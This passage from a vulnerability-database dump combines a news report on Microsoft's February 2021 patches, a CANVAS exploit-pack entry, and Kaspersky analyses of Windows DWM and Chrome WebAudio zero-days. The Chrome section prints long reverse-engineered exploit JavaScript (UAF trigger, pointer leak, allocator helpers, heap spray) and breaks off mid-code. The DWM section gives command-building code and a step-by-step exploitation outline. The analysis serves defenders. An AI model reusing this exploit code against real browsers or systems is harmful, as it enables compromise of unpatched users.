\"password auditor\" )\n\nIn a separate technical write-up, the researchers said a zero-day exploit leveraging the flaw was detected in a \"very limited number of attacks\" against victims located in China by a threat actor named Bitter APT. The attacks were discovered in December 2020.\n\n\"This zero-day is a new vulnerability which caused by win32k callback, it could be used to escape the sandbox of Microsoft [Internet Explorer] browser or Adobe Reader on the latest Windows 10 version,\" DBAPPSecurity researchers [said](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>). \"The vulnerability is high quality and the exploit is sophisticated.\"\n\nIt's worth noting that Adobe, as part of its February patch, [addressed](<https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>) a critical buffer overflow flaw in Adobe Acrobat and Reader for Windows and macOS (CVE-2021-21017) that it said could lead to arbitrary code execution in the context of the current user.\n\nThe company also warned of active exploitation attempts against the bug in the wild in limited attacks targeting Adobe Reader users on Windows, mirroring aforementioned findings from DBAPPSecurity.\n\nWhile neither Microsoft nor Adobe has provided additional details, the concurrent patching of the two flaws raises the possibility that the vulnerabilities are being chained to carry out the in-the-wild attacks.\n\n### Netlogon Enforcement Mode Goes Into Effect\n\nMicrosoft's Patch Tuesday update also resolves a number of remote code execution (RCE) flaws in Windows DNS Server (CVE-2021-24078), .NET Core, and Visual Studio (CVE-2021-26701), Microsoft Windows Codecs Library (CVE-2021-24081), and Fax Service (CVE-2021-1722 and CVE-2021-24077).\n\nThe RCE in Windows DNS server component is rated 9.8 for severity, making it a critical vulnerability that, if left unpatched, could permit an unauthorized adversary to execute arbitrary code and potentially redirect legitimate traffic to malicious servers.\n\nMicrosoft is also taking this month to push second round of fixes for the [Zerologon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>) flaw (CVE-2020-1472) that was originally resolved in August 2020, following which [reports of active exploitation](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) targeting unpatched systems emerged in September 2020.\n\nStarting February 9, the domain controller \"[enforcement mode](<https://msrc-blog.microsoft.com/2021/01/14/netlogon-domain-controller-enforcement-mode-is-enabled-by-default-beginning-with-the-february-9-2021-security-update-related-to-cve-2020-1472/>)\" will be [enabled by default](<https://support.microsoft.com/help/4557222#EnablingEnforcementMode>), thus blocking \"vulnerable [Netlogon] connections from non-compliant devices.\"\n\nIn addition, the Patch Tuesday update rectifies two information disclosure bugs \u2014 one in Edge browser for Android (CVE-2021-24100) that could have revealed personally identifiable information and payment information of a user, and the other in Microsoft Teams for iOS (CVE-2021-24114) that could have exposed the Skype token value in the preview URL for images in the app.\n\n### RCE Flaws in Windows TCP/IP Stack\n\nLastly, the Windows maker released a set of fixes affecting its TCP/IP implementation \u2014 consisting of two RCE flaws (CVE-2021-24074 and CVE-2021-24094) and one denial of service vulnerability (CVE-2021-24086) \u2014 that it said could be exploited with a DoS attack.\n\n\"The DoS exploits for these CVEs would allow a remote attacker to cause a stop error,\" Microsoft [said](<https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/>) in an advisory. \"Customers might receive a blue screen on any Windows system that is directly exposed to the internet with minimal network traffic. Thus, we recommend customers move quickly to apply Windows security updates this month.\"\n\nThe tech giant, however, noted that the complexity of the two TCP/IP RCE flaws would make it hard to develop functional exploits. But it expects attackers to create DoS exploits much more easily, turning the security weakness into an ideal candidate for exploitation in the wild.\n\nTo install the latest security updates, Windows users can head to Start &gt; Settings &gt; Update &amp; Security &gt; Windows Update or by selecting Check for Windows updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-02-15T11:58:01", "published": "2021-02-10T04:44:00", "id": "THN:0C87C22B19E7073574F7BA69985A07BF", "href": "https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html", "type": "thn", "title": "Microsoft Issues Patches for In-the-Wild 0-day and 55 Others Windows Bugs", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2017-01-11T18:07:43", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0099", "CVE-2016-7255"], "edition": 1, "description": "**Name**| ms16_135 \n---|--- \n**CVE**| CVE-2016-0099 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS16-135 SetWindowLongPtr Vulnerability \n**Notes**| CVE Name: CVE-2016-0099 \nVENDOR: Microsoft \nNotes: \nThe vulnerable (and now patched) function is actually xxxNextWindow(), but since \nGoogle mentioned SetWindowLongPtr() in their release, we use that name here. \n \nOlder systems are definitely vulnerable, but we have developed/tested on Win10 Anniversary Update for now. \n \nRepeatability: Infinite \nReferences: ['https://technet.microsoft.com/en-us/library/security/ms16-135.aspx', 'https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255'] \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7255 \n\n", "modified": "2016-11-10T02:00:09", "published": "2016-11-10T02:00:09", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms16_135", "id": "MS16_135", "type": "canvas", "title": "Immunity Canvas: MS16_135", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2021-04-13T18:39:29", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0797", "CVE-2021-1732", "CVE-2021-28310"], "description": "\n\nWhile analyzing the [CVE-2021-1732 exploit](<https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) originally discovered by the DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we discovered another zero-day exploit we believe is linked to the same actor. We reported this new exploit to Microsoft in February and after confirmation that it is indeed a zero-day, it received the designation CVE-2021-28310. Microsoft [released a patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>) to this vulnerability as a part of its April security updates.\n\nWe believe this exploit is used in the wild, potentially by several threat actors. It is an escalation of privilege (EoP) exploit that is likely used together with other browser exploits to escape sandboxes or get system privileges for further access. Unfortunately, we weren&#x27;t able to capture a full chain, so we don&#x27;t know if the exploit is used with another browser zero-day, or coupled with known, patched vulnerabilities.\n\nThe exploit was initially identified by our advanced exploit prevention technology and related detection records. In fact, over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again. We will continue to improve defenses for our users by enhancing technologies and working with third-party vendors to patch vulnerabilities, making the internet more secure for everyone. In this blog we provide a technical analysis of the vulnerability and how the bad guys exploited it. More information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## Technical details\n\nCVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using DirectComposition API. [DirectComposition](<https://docs.microsoft.com/en-us/windows/win32/directcomp/directcomposition-portal>) is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.). We&#x27;ve already published a [blogpost](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>) about in-the-wild zero-days abusing DirectComposition API. DirectComposition API is implemented by the win32kbase.sys driver and the names of all related syscalls start with the string &quot;NtDComposition&quot;.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/13101315/CVE_2021_28310_01.png>)\n\n_**DirectComposition syscalls in the win32kbase.sys driver**_\n\nFor exploitation only three syscalls are required: NtDCompositionCreateChannel, NtDCompositionProcessChannelBatchBuffer and NtDCompositionCommitChannel. The NtDCompositionCreateChannel syscall initiates a channel that can be used together with the NtDCompositionProcessChannelBatchBuffer syscall to send multiple DirectComposition commands in one go for processing by the kernel in a batch mode. For this to work, commands need to be written sequentially in a special buffer mapped by NtDCompositionCreateChannel syscall. Each command has its own format with a variable length and list of parameters.\n \n \n enum DCOMPOSITION_COMMAND_ID\n {\n \tProcessCommandBufferIterator,\n \tCreateResource,\n \tOpenSharedResource,\n \tReleaseResource,\n \tGetAnimationTime,\n \tCapturePointer,\n \tOpenSharedResourceHandle,\n \tSetResourceCallbackId,\n \tSetResourceIntegerProperty,\n \tSetResourceFloatProperty,\n \tSetResourceHandleProperty,\n \tSetResourceHandleArrayProperty,\n \tSetResourceBufferProperty,\n \tSetResourceReferenceProperty,\n \tSetResourceReferenceArrayProperty,\n \tSetResourceAnimationProperty,\n \tSetResourceDeletedNotificationTag,\n \tAddVisualChild,\n \tRedirectMouseToHwnd,\n \tSetVisualInputSink,\n \tRemoveVisualChild\n };\n\n**_List of command IDs supported by the function DirectComposition::CApplicationChannel::ProcessCommandBufferIterator_**\n\nWhile these commands are processed by the kernel, they are also serialized into another format and passed by the Local Procedure Call (LPC) protocol to the Desktop Window Manager (dwm.exe) process for rendering to the screen. This procedure could be initiated by the third syscall \u2013 NtDCompositionCommitChannel.\n\nTo trigger the vulnerability the discovered exploit uses three types of commands: CreateResource, ReleaseResource and SetResourceBufferProperty.\n \n \n void CreateResourceCmd(int resourceId)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = CreateResource;\n \tbuf[1] = resourceId;\n \tbuf[2] = PropertySet; // MIL_RESOURCE_TYPE\n \tbuf[3] = FALSE;\n \tBatchLength += 16;\n }\n \n void ReleaseResourceCmd(int resourceId)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = ReleaseResource;\n \tbuf[1] = resourceId;\n \tBatchLength += 8;\n }\n \n void SetPropertyCmd(int resourceId, bool update, int propertyId, int storageOffset, int hidword, int lodword)\n {\n \tDWORD *buf = (DWORD *)((PUCHAR)pMappedAddress + BatchLength);\n \t*buf = SetResourceBufferProperty;\n \tbuf[1] = resourceId;\n \tbuf[2] = update;\n \tbuf[3] = 20;\n \tbuf[4] = propertyId;\n \tbuf[5] = storageOffset;\n \tbuf[6] = _D2DVector2; // DCOMPOSITION_EXPRESSION_TYPE\n \tbuf[7] = hidword;\n \tbuf[8] = lodword;\n \tBatchLength += 36;\n }\n\n_**Format of commands used in exploitation**_\n\nLet&#x27;s take a look at the function CPropertySet::ProcessSetPropertyValue in dwmcore.dll. This function is responsible for processing the SetResourceBufferProperty command. We are most interested in the code responsible for handling DCOMPOSITION_EXPRESSION_TYPE = D2DVector2.\n \n \n int CPropertySet::ProcessSetPropertyValue(CPropertySet *this, ...)\n {\n ...\n \n if (expression_type == _D2DVector2)\n {\n if (!update)\n {\n CPropertySet::AddProperty<D2DVector2>(this, propertyId, storageOffset, _D2DVector2, value);\n }\n else\n {\n if ( storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF )\n {\n goto fail;\n }\n \n CPropertySet::UpdateProperty<D2DVector2>(this, propertyId, _D2DVector2, value);\n }\n }\n \n ...\n }\n \n int CPropertySet::AddProperty<D2DVector2>(CResource *this, unsigned int propertyId, int storageOffset, int type, _QWORD *value)\n {\n int propertyIdAdded;\n \n int result = PropertySetStorage<DynArrayNoZero,PropertySetUserModeAllocator>::AddProperty<D2DVector2>(\n this->propertiesData,\n type,\n value,\n &propertyIdAdded);\n if ( result < 0 )\n {\n return result;\n }\n \n if ( propertyId != propertyIdAdded || storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF )\n {\n return 0x88980403;\n }\n \n result = CPropertySet::PropertyUpdated<D2DMatrix>(this, propertyId);\n if ( result < 0 )\n {\n return result;\n }\n \n return 0;\n }\n \n int CPropertySet::UpdateProperty<D2DVector2>(CResource *this, unsigned int propertyId, int type, _QWORD *value)\n {\n if ( this->properties[propertyId]->type == type )\n {\n *(_QWORD *)(this->propertiesData + (this->properties[propertyId]->offset & 0x1FFFFFFF)) = *value;\n \n int result = CPropertySet::PropertyUpdated<D2DMatrix>(this, propertyId);\n if ( result < 0 )\n {\n return result;\n }\n \n return 0;\n }\n else\n {\n return 0x80070057;\n }\n }\n\n**_Processing of the SetResourceBufferProperty (D2DVector2) command in dwmcore.dll_**\n\nFor the SetResourceBufferProperty command with the expression type set to D2DVector2, the function CPropertySet::ProcessSetPropertyValue(\u2026) would either call CPropertySet::AddProperty&lt;D2DVector2&gt;(\u2026) or CPropertySet::UpdateProperty&lt;D2DVector2&gt;(\u2026) depending on whether the update flag is set in the command. The first thing that catches the eye is the way the new property is added in the CPropertySet::AddProperty&lt;D2DVector2&gt;(\u2026) function. You can see that it adds a new property to the resource, but it only checks if the propertyId and storageOffset of a new property are equal to the provided values after the new property is added, and returns an error if that&#x27;s not the case. Checking something after a job is done is bad coding practice and can result in vulnerabilities. However, a real issue can be found in the CPropertySet::UpdateProperty&lt;D2DVector2&gt;(\u2026) function. No check takes place that will ensure if the provided propertyId is less than the count of properties added to the resource. As a result, an attacker can use this function to perform an OOB write past the propertiesData buffer if it manages to bypass two additional checks for data inside the properties array.\n \n \n (1)\tstorageOffset == this->properties[propertyId]->offset & 0x1FFFFFFF\n (2)\tthis->properties[propertyId]->type == type\n\n_**Conditions which need to be met for exploitation in dwmcore.dll**_\n\nThese checks could be bypassed if an attacker is able to allocate and release objects in the dwm.exe process to groom heap into the desired state and spray memory at specific locations with fake properties. The discovered exploit manages to do this using the CreateResource, ReleaseResource and SetResourceBufferProperty commands.\n\nAt the time of writing, we still hadn&#x27;t analyzed the updated binaries that are fixing this vulnerability, but to exclude the possibility of other variants for this vulnerability Microsoft would need to check the count of properties for other expression types as well.\n\nEven with the above issues in dwmcore.dll, if the desired memory state is achieved to bypass the previously mentioned checks and a batch of commands are issued to trigger the vulnerability, it still won&#x27;t be triggered because there is one more thing preventing it from happening.\n\nAs mentioned above, commands are first processed by the kernel and only after that are they sent to Desktop Window Manager (dwm.exe). This means that if you try to send a command with an invalid propertyId, NtDCompositionProcessChannelBatchBuffer syscall will return an error and the command will not be passed to the dwm.exe process. SetResourceBufferProperty commands with expression type set to D2DVector2 are processed in the win32kbase.sys driver with the functions DirectComposition::CPropertySetMarshaler::AddProperty&lt;D2DVector2&gt;(\u2026) and DirectComposition::CPropertySetMarshaler::UpdateProperty&lt;D2DVector2&gt;(\u2026), which are very similar to those present in dwmcore.dll (it&#x27;s quite likely they were copy-pasted). However, the kernel version of the UpdateProperty&lt;D2DVector2&gt; function has one notable difference \u2013 it actually checks the count of properties added to the resource.\n \n \n int DirectComposition::CPropertySetMarshaler::UpdateProperty<D2DVector2>(DirectComposition::CPropertySetMarshaler *this, unsigned int *commandParams, _QWORD *value)\n {\n unsigned int propertyId = commandParams[0];\n unsigned int storageOffset = commandParams[1];\n unsigned int type = commandParams[2];\n \n if ( propertyId >= this->propertiesCount\n || storageOffset != this->properties[propertyId]->offset & 0x1FFFFFFF)\n || type != this->properties[propertyId]->type )\n {\n return 0xC000000D;\n }\n else\n {\n *(_QWORD *)(this->propertiesData + (this->properties[propertyId]->offset & 0x1FFFFFFF)) = *value;\n ...\n }\n return 0;\n }\n\n_**DirectComposition::CPropertySetMarshaler::UpdateProperty&lt;D2DVector2&gt;(\u2026) in win32kbase.sys**_\n\nThe check for propertiesCount in the kernel mode version of the UpdateProperty&lt;D2DVector2&gt; function prevents further processing of a malicious command by its user mode twin and mitigates the vulnerability, but this is where DirectComposition::CPropertySetMarshaler::AddProperty&lt;D2DVector2&gt;(\u2026) comes in to play. The kernel version of the AddProperty&lt;D2DVector2&gt; function works exactly like its user mode variant and it also applies the same behavior of checking property after it has already been added and returns an error if propertyId and storageOffset of the created property do not match the provided values. Because of this, it&#x27;s possible to use the AddProperty&lt;D2DVector2&gt; function to add a new property and force the function to return an error and cause inconsistency between the number of properties assigned to the same resource in kernel mode/user mode. The propertiesCount check in the kernel could be bypassed this way and malicious commands would be passed to Desktop Window Manager (dwm.exe).\n\nInconsistency between the number of properties assigned to the same resource in kernel mode/user mode could be a source of other vulnerabilities, so we recommend Microsoft to change the behavior of the AddProperty function and check properties before they are added.\n\nThe whole exploitation process for the discovered exploit is as follows:\n\n 1. Create a large number of resources with properties of specific size to get heap into predictable state.\n 2. Create additional resources with properties of specific size and content to spray memory at specific locations with fake properties.\n 3. Release resources created at stage 2.\n 4. Create additional resources with properties. These resources will be used to perform OOB writes.\n 5. Make holes among resources created at stage 1.\n 6. Create additional properties for resources created at stage 4. Their buffers are expected to be allocated at specific locations.\n 7. Create &quot;special&quot; properties to cause inconsistency between the number of properties assigned to the same resource in kernel mode/user mode for resources created at stage 4.\n 8. Use OOB write vulnerability to write shellcode, create an object and get code execution.\n 9. Inject additional shellcode into another system process.\n\nKaspersky products detect this exploit with the verdicts:\n\n * HEUR:Exploit.Win32.Generic\n * HEUR:Trojan.Win32.Generic\n * PDM:Exploit.Win32.Generic", "modified": "2021-04-13T17:35:50", "published": "2021-04-13T17:35:50", "id": "SECURELIST:A3D3514100806269750A23D748D34C59", "href": "https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/", "type": "securelist", "title": "Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-29T22:19:56", "bulletinFamily": "blog", "cvelist": ["CVE-2010-2744", "CVE-2016-7255", "CVE-2019-0859", "CVE-2019-13720", "CVE-2019-1458"], "description": "\n\nBack in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. While we've already published blog posts briefly describing this operation (available [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), in this blog post we'd like to take a deep technical dive into the exploits and vulnerabilities used in this attack.\n\n## Google Chrome remote code execution exploit\n\nIn the [original blog post](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) we described the exploit loader responsible for initial validation of the target and execution of the next stage JavaScript code containing the full browser exploit. The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and WebAssembly (WASM) module used in the later stages of exploitation. The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome 76.0.3809.87 and 77.0.3865.75. However, the vulnerability was introduced long before that and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following [commit](<https://chromium.googlesource.com/chromium/src.git/+/6a2e670a243b815cf043f8da4d26ecb9a64d307b>). A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:\n \n \n if (!buffer) {\n +\tBaseAudioContext::GraphAutoLocker context_locker(Context());\n +\tMutexLocker locker(process_lock_);\n \treverb_.reset();\n \tshared_buffer_ = nullptr;\n \treturn;\n\nAs you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy reverb_ and shared_buffer_ objects.\n \n \n class MODULES_EXPORT ConvolverHandler final : public AudioHandler {\n ...\n std::unique_ptr<Reverb> reverb_;\n std::unique_ptr<SharedAudioBuffer> shared_buffer_;\n ...\n\nThese objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.\n\nThe exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the [PartitionAlloc](<https://github.com/scrapy/base-chromium/blob/master/allocator/partition_allocator/PartitionAlloc.md>) memory allocator. This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: SuperPage address, PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of PartitionPage metadata. All constants are taken from [partition_alloc_constants.h](<https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/partition_alloc_constants.h>):\n \n \n function getSuperPageBase(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet superPageBaseMask = ~superPageOffsetMask;\n \tlet superPageBase = addr & superPageBaseMask;\n \treturn superPageBase;\n }\n \n function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet partitionPageBase = partitionPageIndex << BigInt(14);\n \tlet finalAddr = superPageBase + partitionPageBase;\n \treturn finalAddr;\n }\n \n function getPartitionPageIndex(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \treturn partitionPageIndex;\n }\n \n function getMetadataAreaBaseFromPartitionSuperPage(addr) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet systemPageSize = BigInt(0x1000);\n \treturn superPageBase + systemPageSize;\n }\n \n function getPartitionPageMetadataArea(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \tlet pageMetadataSize = BigInt(0x20);\n \tlet partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize;\n \treturn partitionPageMetadataPtr;\n }\n\nIt's interesting that the exploit also uses the relatively new built-in [BigInt](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt>) class to handle 64-bit values; authors usually use their own primitives in exploits.\n\nAt first, the code initiates OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.\n \n \n let gcPreventer = [];\n let iirFilters = [];\n \n function initialSetup() {\n \tlet audioCtx = new OfflineAudioContext(1, 20, 3000);\n \n \tlet feedForward = new Float64Array(2);\n \tlet feedback = new Float64Array(1);\n \n \tfeedback[0] = 1;\n \tfeedForward[0] = 0;\n \tfeedForward[1] = -1;\n \n \tfor (let i = 0; i < 256; i++)\n iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback));\n }\n\nAfter that, the exploit begins the initial stage of exploitation and tries to trigger a UAF bug. For that to work the exploit creates the objects that are needed for the Reverb component. It creates another huge OfflineAudioContext object and two ConvolverNode objects \u2013 ScriptProcessorNode to start audio processing and AudioBuffer for the audio channel.\n \n \n async function triggerUaF(doneCb) {\n \tlet audioCtx = new OfflineAudioContext(2, 0x400000, 48000);\n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \tlet scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1);\n \tlet channelBuffer = audioCtx.createBuffer(1, 1, 48000);\n \n \tconvolver.buffer = channelBuffer;\n \tbufferSource.buffer = channelBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tchannelBuffer.getChannelData(0).fill(0);\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(scriptNode);\n \tscriptNode.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \tscriptNode.onaudioprocess = function(evt) {\n \t\tlet channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer);\n \n \t\tfor (let j = 0; j < channelDataArray.length; j++) {\n \t\tif (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) {\n \t\t\tlet u64Array = new BigUint64Array(1);\n \t\t\tlet u32Array = new Uint32Array(u64Array.buffer);\n \t\t\tu32Array[0] = channelDataArray[j + 0];\n \t\t\tu32Array[1] = channelDataArray[j + 1];\n \n \t\t\tlet leakedAddr = byteSwapBigInt(u64Array[0]);\n \t\t\tif (leakedAddr >> BigInt(32) > BigInt(0x8000))\n \t\t\tleakedAddr -= BigInt(0x800000000000);\n \t\t\tlet superPageBase = getSuperPageBase(leakedAddr);\n \n \t \t\tif (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) {\n \t\t\tfinished = true;\n \t\t\tevt = null;\n \n \t\t\tbufferSource.disconnect();\n \t\t\tscriptNode.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\tsetTimeout(function() {\n \t\t\tdoneCb(leakedAddr);\n \t\t\t}, 1);\n \n \t\t\treturn;\n \t\t\t}\n \t\t}\n \t\t}\n \t};\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (!finished) {\n \t \tfinished = true;\n \t \ttriggerUaF(doneCb);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tconvolver.buffer = null;\n \t\tconvolver.buffer = channelBuffer;\n \t\tawait later(100); // wait 100 millseconds\n \t}\n };\n\nThis function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger a bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:\n \n \n function later(delay) {\n \treturn new Promise(resolve => setTimeout(resolve, delay));\n }\n\nDuring execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes. The existence of such data would mean the UAF was triggered successfully and at this stage the audio channel buffer should contain a leaked pointer.\n\nThe PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when the memory region is freed, it byteswaps the address of the pointer and after that the byteswapped address is added to the FreeList structure. This complicates exploitation because the attempt to dereference such a pointer will crash the process. To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:\n \n \n function byteSwapBigInt(x) {\n \tlet result = BigInt(0);\n \tlet tmp = x;\n \n \tfor (let i = 0; i < 8; i++) {\n \t\tresult = result << BigInt(8);\n \t\tresult += tmp & BigInt(0xFF);\n \t\ttmp = tmp >> BigInt(8);\n \t}\n \n \treturn result;\n }\n\nThe exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class that is passed to the callback function _initialUAFCallback_.\n \n \n let sharedAudioCtx;\n let iirFilterFeedforwardAllocationPtr;\n \n function initialUAFCallback(addr) {\n \tsharedAudioCtx = new OfflineAudioContext(1, 1, 3000);\n \n \tlet partitionPageIndexDelta = undefined;\n \tswitch (majorVersion) {\n \t\tcase 77: // 77.0.3865.75\n \t \tpartitionPageIndexDelta = BigInt(-26);\n \tbreak;\n \t\tcase 76: // 76.0.3809.87\n \t\tpartitionPageIndexDelta = BigInt(-25);\n \t \tbreak;\n \t}\n \n \tiirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0);\n \n triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback);\n }\n\nThe exploit uses the leaked pointer to get the address of the raw pointer to the _feedforward__ array with the AudioArray&lt;double&gt; type that is present in the IIRProcessor object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages and there is a special code inside initialUAFCallback to handle that.\n\nThe vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. This function also executes recursively.\n \n \n let floatArray = new Float32Array(10);\n let audioBufferArray1 = [];\n let audioBufferArray2 = [];\n let imageDataArray = [];\n \n async function triggerSecondUAF(addr, doneCb) {\n \tlet counter = 0;\n \tlet numChannels = 1;\n \n \tlet audioCtx = new OfflineAudioContext(1, 0x100000, 48000);\n \n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \n \tlet bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000);\n \tlet smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000);\n \n \tsmallAudioBuffer.getChannelData(0).fill(0);\n \n \tfor (let i = 0; i < numChannels; i++) {\n \t\tlet channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer);\n \t\tchannelDataArray[0] = addr;\n \t}\n \n \tbufferSource.buffer = bigAudioBuffer;\n \tconvolver.buffer = smallAudioBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (finished) {\n \t\taudioCtx = null;\n \n \t\tsetTimeout(doneCb, 200);\n \t\treturn;\n \t\t} else {\n \t\tfinished = true;\n \n \t\tsetTimeout(function() {\n \t\ttriggerSecondUAF(addr, doneCb);\n \t\t}, 1);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tcounter++;\n \n \t\tconvolver.buffer = null;\n \n \t\tawait later(1); // wait 1 millisecond\n \n \t\tif (finished)\n \t\tbreak;\n \n \t\tfor (let i = 0; i < iirFilters.length; i++) {\n \t\tfloatArray.fill(0);\n \t iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n 